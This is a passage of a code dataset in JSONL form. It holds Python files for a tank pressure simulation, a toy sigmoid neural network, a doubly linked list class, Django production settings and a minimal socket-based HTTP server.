    def __init__(self):\n        \"\"\"Constructor for the simulation class. Calls readConfig() and\n        creates an initial simulation state.\"\"\"\n        self.readConfig()\n        # define the comm interface type (based on config)\n        ifaceinfo = self.config['simiface']\n        ifacetype = getattr(ifaces, ifaceinfo['typ'])\n        self.interface = ifacetype(**ifaceinfo)\n        self.interface.initialize()\n\n        # initialize variables in the process-variable dictionary;\n        # use a deep copy so that we can't change the config dictionary\n        self.simState = copy.deepcopy(self.config['sim_state'])\n        self.simState['simtime'] = time.time()\n\n    def step(self, upto=None):\n        \"\"\"Advances the simulation state from the current simulation time to\n        the time given in the parameter upto.\n\n        @param upto Time to simulate from simState['simtime'] to upto.\n                    upto should be a float in the format of the time.time()\n                    call -- i.e. unix time. If upto is None, the current time\n                    will be used.\n        \"\"\"\n        if upto is None:\n            upto = time.time()\n        deltaT = upto - self.simState['simtime']\n        if deltaT < 0:\n            # This happens when we receive an update packet dated from before the\n            #  current simulation time. In that case, we return to let the\n            #  changes be applied, and then the simulation will step to the\n            #  current time, and all will be well. In the worst case, changes\n            #  should only be 100 ms old.\n            return\n        consts = self.config['sim_constants']\n\n        # We're doing a simple model that's linear over time. Non-linear models\n        #  may require iterating over fractions of deltaT to be accurate.\n        #  Numerical techniques from Sage or SciPy may be required for advanced\n        #  models.\n\n        if self.simState['pump']:\n            pumpContribution = deltaT * consts['pump_rate']\n        else:\n            pumpContribution = 0\n\n        if self.simState['valve']:\n            valveContribution = deltaT * consts['valve_rate']\n        else:\n            valveContribution = 0\n\n        self.simState['pressure'] = self.simState['pressure'] + (\n            pumpContribution + valveContribution)\n\n        # Negative pressures are impossible\n        if self.simState['pressure'] < 0: self.simState['pressure'] = 0\n\n        self.simState['simtime'] = upto\n\n","sub_path":"mastertestbed/trunk/sims/rtutank/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"61994657","text":"import numpy as np\nimport keyboard as kb\nimport sys\n\niterations = 1000000000\n\n# Training data\nflowers = [[3, 1.5, 1],\n           [2, 1, 0],\n           [4, 1.5, 1],\n           [3, 1, 0],\n           [3.5, .5, 1],\n           [2, .5, 0],\n           [5.5, 1, 1],\n           [1, 1, 0]]\n\n# Sigmoid function\n\n\ndef sigmoid(x):\n    f = 1/(1+np.exp(-x))\n    return f\n\n# Neural network function\n\n\ndef neural_network():\n    # Parameter initialization\n    w1 = np.random.randn()\n    w2 = np.random.randn()\n    b = np.random.randn()\n    learning_rate = 0.2  # The speed at which the NN learns\n\n    # Learning with a random point that changes every time\n    for i in range(iterations):\n        # Taking a random point to learn from\n        rand_index = np.random.randint(len(flowers))\n        learning_flower = flowers[rand_index]\n        target = learning_flower[2]\n\n        # Neural network calculations\n        z = w1 * learning_flower[0] + w2 * learning_flower[1] + b\n        pred = sigmoid(z)\n\n        # Error\n        cost = (pred - target)**2\n\n        # Back propagation\n        dc_dpred = 2*(pred - target)\n\n
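        # Chain-rule factor: d(sigmoid)/dz = sigmoid(z) * (1 - sigmoid(z)),\n        # since f = 1/(1+e^-z) implies f' = f*(1-f).\n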
        dpred_dz = sigmoid(z) * (1 - sigmoid(z))\n\n        dz_dw1 = learning_flower[0]\n        dz_dw2 = learning_flower[1]\n        dz_db = 1\n\n        dc_dw1 = dc_dpred * dpred_dz * dz_dw1\n        dc_dw2 = dc_dpred * dpred_dz * dz_dw2\n        dc_db = dc_dpred * dpred_dz * dz_db\n\n        w1 = w1 - learning_rate * dc_dw1\n        w2 = w2 - learning_rate * dc_dw2\n        b = b - learning_rate * dc_db\n\n        # Periodically save the current parameters to NN.txt\n        if (i % 100) == 0:\n            neural_network_data = open('NN.txt', 'w+')\n            neural_network_data.write(str(w1) + ' ')\n            neural_network_data.write(str(w2) + ' ')\n            neural_network_data.write(str(b) + '\\n \\n')\n            neural_network_data.close()\n\n        # Print training progress as a percentage\n        if (i % 100000) == 0:\n            print(np.around(i/iterations * 100, decimals=4))\n\n        # Check if ctrl + S is pressed and stop training\n        if kb.is_pressed('ctrl+s'):\n            print('You closed the app')\n            sys.exit()\n\n\nneural_network()\n","sub_path":"Python/Flower Problem/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"557728795","text":"class ListNode:\n    def __init__(self, value, prev=None, next=None):\n        self.value = value\n        self.prev = prev\n        self.next = next\n\nclass DoublyLinkedList:\n    def __init__(self, node=None):\n        self.head = node\n        self.tail = node\n        self.length = 1 if node else 0\n\n    def __len__(self):\n        # should return the length\n        return self.length\n\n    def add_to_head(self, value):\n        # adds a new node to the front of the DLL\n        new_node = ListNode(value)\n\n        if self.head:\n            new_node.next = self.head\n            self.head.prev = new_node\n\n            self.head = new_node\n        else:\n            self.head, self.tail = new_node, new_node\n\n        self.length += 1\n\n    def remove_from_head(self):\n        # removes the head node and returns its value\n        if self.length == 0: return None\n\n        remove = self.head\n        self.length -= 1\n        if self.head == self.tail:\n            self.head, self.tail = None, None\n            return remove.value\n\n        else:\n            self.head = self.head.next\n            remove.next, self.head.prev = None, None\n\n            return remove.value\n\n    def add_to_tail(self, value):\n        # adds a new node to the back of the DLL\n        new_node = ListNode(value)\n        self.length += 1\n        if self.tail is None: self.head, self.tail = new_node, new_node\n\n        else:\n            self.tail.next = new_node\n            new_node.prev = self.tail\n\n            self.tail = new_node\n\n    def remove_from_tail(self):\n        # removes the tail node and returns its value\n        if self.length == 0: return None\n\n        self.length -= 1\n\n        removed = self.tail\n        if self.head == self.tail:\n            self.head, self.tail = None, None\n            return removed.value\n\n        else:\n            self.tail = self.tail.prev\n            self.tail.next, removed.prev = None, None\n\n            return removed.value\n\n    def move_to_front(self, node):\n        # takes a node and moves it to the front\n        if node == self.head: return\n\n        if node == self.tail:\n            self.tail = node.prev\n            self.tail.next = None\n        else:\n            node_prev, node_next = node.prev, node.next\n            node_prev.next, node_next.prev = node_next, node_prev\n\n        # relink the detached node at the head, clearing its stale prev pointer\n        node.prev = None\n        node.next = self.head\n        self.head.prev = node\n        self.head = node\n\n    def move_to_end(self, node):\n        # takes a node and moves it to the end\n        if node == self.tail: return\n\n        if node == self.head:\n            self.head = self.head.next\n            self.head.prev = None\n        else:\n            node_prev, node_next = node.prev, node.next\n            node_prev.next, node_next.prev = node_next, node_prev\n\n        # relink the detached node at the tail, clearing its stale next pointer\n        node.next = None\n        node.prev = self.tail\n        self.tail.next = node\n        self.tail = node\n\n    def delete(self, node):\n        # deletes a node\n        if self.length == 0: return None\n\n        self.length -= 1\n        if self.head == self.tail:\n            self.head, self.tail = None, None\n\n            return node.value\n\n        elif node == self.head:\n            self.head = self.head.next\n            node.next, self.head.prev = None, None\n\n            return node.value\n\n        elif node == self.tail:\n            self.tail = self.tail.prev\n            node.prev, self.tail.next = None, None\n\n            return node.value\n\n        else:\n            node_prev, node_next = node.prev, node.next\n            node_prev.next, node_next.prev = node_next, node_prev\n\n            return node.value\n\n    def get_max(self):\n        # gets the max value from the nodes and returns it\n        if self.head is None: return None\n        return check_node(self.head)\n\ndef check_node(node):\n\n    recurse_max = None\n    if node.next is not None: recurse_max = check_node(node.next)\n\n    if recurse_max is None:\n        return node.value\n    if node.value > recurse_max:\n        return node.value\n    else:\n        return recurse_max
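\n\n# A minimal usage sketch (illustrative):\nif __name__ == '__main__':\n    dll = DoublyLinkedList(ListNode(1))\n    dll.add_to_tail(2)\n    dll.add_to_head(0)\n    dll.move_to_end(dll.head)       # 0 moves to the back: 1, 2, 0\n    print(len(dll), dll.get_max())  # -> 3 2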
","sub_path":"doubly_linked_list/dll_1.py","file_name":"dll_1.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"207317338","text":"# -*- coding: utf-8 -*-\n\nimport os\n\nimport dj_database_url\n\nfrom .base import *\n\n\nADMINS = ()\n\nALLOWED_HOSTS = ['127.0.0.1', 'localhost']\n\nDEBUG = False\n\nDEFAULT_FROM_EMAIL = os.getenv('DEFAULT_FROM_EMAIL', '')\n\nEMAIL_BACKEND = os.getenv('EMAIL_BACKEND', '')\n\nINSTALLED_APPS = INSTALLED_APPS + (\n    'gunicorn',\n    'storages',\n)\n\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\nSERVER_EMAIL = os.getenv('SERVER_EMAIL', '')\n\nSESSION_CACHE_ALIAS = 'default'\n\nSESSION_COOKIE_SECURE = True\n\nSESSION_ENGINE = 'django.contrib.sessions.backends.cache'\n\n\n# ---------------\n# dj-database-url\n# https://github.com/kennethreitz/dj-database-url\n# ---------------\nDATABASES = {\n    'default': dj_database_url.config()\n}\n\n\n# ---------------\n# django-storages\n# http://django-storages.readthedocs.org/en/latest/\n# ---------------\nif os.getenv('ENABLE_DJANGO_STORAGES', False):\n    DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\n\n    STATICFILES_STORAGE = 'storages.backends.s3boto.S3BotoStorage'\n\n    AWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID', '')\n\n    AWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET_ACCESS_KEY', '')\n\n    AWS_STORAGE_BUCKET_NAME = os.getenv('AWS_STORAGE_BUCKET_NAME', '')\n","sub_path":"src/project_name/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"36565108","text":"import socket\nimport time\n\nfrom utils import log\n\n\ndef run(host='', port=3000):\n    log('start at', '{}:{}'.format(host, port))\n    # Configure the listening socket\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n        s.bind((host, port))\n        # passively wait; 3 is the maximum number of queued connections\n        s.listen(3)\n\n        # infinite loop, serve forever\n        while True:\n            # accept and establish a connection\n            conn, addr = s.accept()\n            # receive the request\n            request = conn.recv(1024)\n            time.sleep(3)  # artificial delay, presumably to simulate a slow server\n            request = request.decode('utf-8')\n            log('request is: ', request)\n            log('Connected by', addr)\n\n            # send the response\n            header = 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n'\n
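            # An HTTP response is the status line and headers, then a blank line\n            # (hence the extra '\\r\\n' below), and then the body.\n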
            body = '<html><body>Yes</body></html>'\n            response = header + '\\r\\n' + body\n            conn.sendall(response.encode('utf-8'))\n            # close the connection\n            conn.close()\n\n\nif __name__ == '__main__':\n    config = dict(\n        host='',\n        port=3000,\n    )\n    run(**config)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}